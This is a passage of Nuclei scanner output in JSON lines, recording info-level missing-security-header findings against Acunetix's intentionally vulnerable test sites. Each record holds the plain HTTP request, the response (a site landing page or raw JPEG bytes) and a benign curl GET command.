Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:26.517796168Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:26.52429718Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufff